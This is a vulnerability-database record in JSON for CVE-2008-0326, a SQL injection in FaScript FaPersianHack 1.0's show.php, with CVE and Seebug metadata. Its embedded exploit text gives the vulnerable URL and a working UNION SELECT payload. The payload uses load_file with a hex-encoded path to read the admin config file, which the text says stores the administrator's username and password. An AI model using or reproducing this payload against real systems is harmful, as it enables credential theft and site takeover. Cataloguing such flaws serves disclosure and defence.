FaScript FaPersianHack 1.0 - show.php SQL Injection Vulnerability

{"bulletinFamily": "exploit", "id": "EDB-ID:4917", "cvelist": ["CVE-2008-0326"], "modified": "2008-01-15T00:00:00", "lastseen": "2016-01-31T21:05:16", "edition": 1, "sourceData": "#####################################################################################\r\n#### FaScript FaPersianHack v1 Remote Sql Injection ####\r\n#### BY IRCRASH ####\r\n#####################################################################################\r\n# #\r\n#AUTHOR : IRCRASH (Dr.Crash) #\r\n# #\r\n#Script Download : http://fascript.com/fapersianhack.zip #\r\n# #\r\n#Injection Adress : http://Sitename/ph/show.php?id=<SqL Code> #\r\n# #\r\n#Help : In This Script Admin Username and Password Save in ./admin/pconfig.php #\r\n# You can open this file with load_file Function in mysql and see admin #\r\n# Username and password in Page Source #\r\n# #\r\n# ./admin/pconfig.php Str2Hex : 0x2e2f61646d696e2f70636f6e6669672e706870 #\r\n# #\r\n#SQL Code for pconfig.php : 999999'%20union/**/select/**/0,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),3,4,5,6/**/from/**/mysql.user/*\r\n# #\r\n# Our site : HTTP://IRCRASH.COM #\r\n# #\r\n#####################################################################################\r\n\r\n# milw0rm.com [2008-01-15]\r\n", "published": "2008-01-15T00:00:00", "href": "https://www.exploit-db.com/exploits/4917/", "osvdbidlist": ["40360"], "reporter": "Khashayar Fereidani", "hash": "b23d4d5675539e0ac8cddff0fa055e13a67bf9b30163e4e6cee73b173327a750", "title": "FaScript FaPersianHack 1.0 - show.php SQL Injection Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "FaScript FaPersianHack v1 (show.php) SQL Injection Vulnerability. CVE-2008-0326. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4917/", "viewCount": 1, "enchantments": {"vulnersScore": 6.4}}

{"result": {"cve": [{"id": "CVE-2008-0326", "type": "cve", "title": "CVE-2008-0326", "description": "SQL injection vulnerability in class/show.php in FaScript FaPersianHack 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter to show.php.", "published": "2008-01-17T17:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0326", "cvelist": ["CVE-2008-0326"], "lastseen": "2016-09-03T10:02:32"}], "seebug": [{"id": "SSV-65130", "type": "seebug", "title": "FaScript FaPersianHack 1.0 - (show.php) SQL Injection Vulnerability", "description": "Summary: \nFaScript FaPersian P1. 0 in class/show. PHP SQL injection vulnerability allows a remote attacker by means of the ID parameter to execute arbitrary SQL commands.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-65130", "cvelist": ["CVE-2008-0326"], "lastseen": "2016-07-28T09:49:12"}]}}